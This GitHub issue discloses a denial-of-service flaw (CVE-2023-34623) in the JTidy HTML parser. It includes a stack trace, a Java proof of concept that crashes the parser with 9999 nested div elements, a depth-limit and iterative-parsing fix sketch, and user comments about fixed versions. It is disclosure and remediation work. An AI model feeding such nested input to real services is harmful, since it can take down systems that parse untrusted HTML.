Stack overflow error caused by jtidy parsing of untrusted Html String #4

Open
PoppingSnack opened this issue Jun 6, 2023 · 4 comments

Comments

@PoppingSnack
Description

Using JTidy to parse an untrusted HTML string may expose an application to denial-of-service (DoS) attacks. If the parser runs on user-supplied input, an attacker can supply deeply nested content that exhausts the call stack and crashes the parser with a StackOverflowError.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at java.base/java.nio.charset.Charset.lookup(Charset.java:457)
	at java.base/java.nio.charset.Charset.isSupported(Charset.java:503)
	at java.base/java.lang.StringCoding.lookupCharset(StringCoding.java:101)
	at java.base/java.lang.StringCoding.decode(StringCoding.java:234)
	at java.base/java.lang.String.<init>(String.java:467)
	at org.w3c.tidy.TidyUtils.getString(TidyUtils.java:658)
	at org.w3c.tidy.Lexer.getToken(Lexer.java:2343)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2051)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)
	at org.w3c.tidy.ParserImpl$ParseBlock.parse(ParserImpl.java:2464)
	at org.w3c.tidy.ParserImpl.parseTag(ParserImpl.java:203)

PoC

        <dependency>
            <groupId>net.sf.jtidy</groupId>
            <artifactId>jtidy</artifactId>
            <version>r938</version>
        </dependency>

import org.w3c.tidy.Tidy;

import java.io.StringReader;

public class PoC {
    public final static int TOO_DEEP_NESTING = 9999;
    public final static String TOO_DEEP_DOC = _nestedDoc(TOO_DEEP_NESTING, "<div>", "</div>", "");


    public static String _nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        sb.append("\n").append(content).append("\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        return sb.toString();
    }

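    public static void main(String[] args) {
        String htmlData = TOO_DEEP_DOC;
        try (StringReader stringReader = new StringReader(htmlData)) {
            Tidy tidy = new Tidy();
            // Parsing the deeply nested <div> elements overflows the call stack.
            tidy.parse(stringReader, System.out);
        } catch (Exception e) {
            // Intentionally empty: StackOverflowError is an Error, not an Exception,
            // so it is not caught here and still terminates the program.
        }
    }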
}

Rectification Solution

  1. Follow the jackson-databind approach: add a depth counter that records the current parsing depth, and throw an exception once the depth exceeds a threshold. (FasterXML/jackson-databind@fcfc499)

  2. Follow the Gson approach: replace the recursive processing of deeply nested arrays or JSON objects with an explicit stack and iteration. (google/gson@2d01d6a20f39881c692977564c1ea591d9f39027)
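
The two approaches above can be sketched roughly as follows. This is not JTidy code: the class DepthLimitSketch, the MAX_DEPTH value, and the toy grammar (only <div> and </div> tokens, no text or attributes) are assumptions made for illustration. parseRecursive keeps the recursion but fails fast once a depth counter passes the limit, and maxDepthIterative replaces the recursion with an explicit stack so that nesting depth is bounded by heap memory rather than by the thread's call stack.

```java
import java.util.ArrayDeque;
import java.util.Deque;

public class DepthLimitSketch {
    /** Hypothetical limit chosen for this sketch; not a JTidy setting. */
    static final int MAX_DEPTH = 500;

    /** Builds n nested <div> elements, similar in spirit to the PoC document. */
    static String nested(int n) {
        StringBuilder sb = new StringBuilder(n * 11);
        for (int i = 0; i < n; i++) sb.append("<div>");
        for (int i = 0; i < n; i++) sb.append("</div>");
        return sb.toString();
    }

    /** Approach 1: recursive descent with a depth counter that fails fast. */
    static int parseRecursive(String s, int pos, int depth) {
        if (depth > MAX_DEPTH) {
            throw new IllegalStateException("nesting deeper than " + MAX_DEPTH);
        }
        // Consume any number of sibling <div>...</div> elements at this level.
        while (s.startsWith("<div>", pos)) {
            pos = parseRecursive(s, pos + 5, depth + 1);
            if (!s.startsWith("</div>", pos)) {
                throw new IllegalArgumentException("expected </div> at " + pos);
            }
            pos += 6;
        }
        return pos; // index of the first character not consumed
    }

    /** Approach 2: explicit stack plus iteration, no recursion at all. */
    static int maxDepthIterative(String s) {
        Deque<String> open = new ArrayDeque<>();
        int pos = 0;
        int max = 0;
        while (pos < s.length()) {
            if (s.startsWith("<div>", pos)) {
                open.push("div");
                max = Math.max(max, open.size());
                pos += 5;
            } else if (s.startsWith("</div>", pos)) {
                if (open.isEmpty()) {
                    throw new IllegalArgumentException("unbalanced </div> at " + pos);
                }
                open.pop();
                pos += 6;
            } else {
                throw new IllegalArgumentException("unexpected input at " + pos);
            }
        }
        if (!open.isEmpty()) {
            throw new IllegalArgumentException("unclosed <div>");
        }
        return max;
    }

    public static void main(String[] args) {
        String deep = nested(9999);
        // The iterative version handles the PoC depth without deep recursion.
        System.out.println("iterative max depth: " + maxDepthIterative(deep));
        try {
            parseRecursive(deep, 0, 0);
        } catch (IllegalStateException e) {
            // The guarded recursive version rejects the input with an ordinary exception.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

With the depth counter, hostile input produces an ordinary exception that the caller can catch, instead of a StackOverflowError. The iterative variant accepts arbitrarily deep input, so a size or depth limit may still be worth adding to bound memory use.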

@carnil
carnil commented Jun 19, 2023

CVE-2023-34623 has been assigned for this issue.

@haumacher
haumacher commented Jun 30, 2023

You could change your coordinates to

<dependency>
    <groupId>com.github.jtidy</groupId>
    <artifactId>jtidy</artifactId>
    <version>1.0.4</version>
</dependency>

to get a fixed version. See https://github.com/jtidy/jtidy.

@kadampriyanka1109
kadampriyanka1109 commented Aug 8, 2023

I'm using jtidy 1.0.4 and CVE-2023-34623 is still being reported.

The dependency I'm using:

<dependency>
    <groupId>com.github.jtidy</groupId>
    <artifactId>jtidy</artifactId>
    <version>1.0.4</version>
</dependency>

The OWASP dependency-check version I'm using is 8.3.1. @haumacher, can you check whether the CVE is really fixed?

@BrunoBehrmann
For me, it was enough to change the formatting of my html file and apply some defaults.
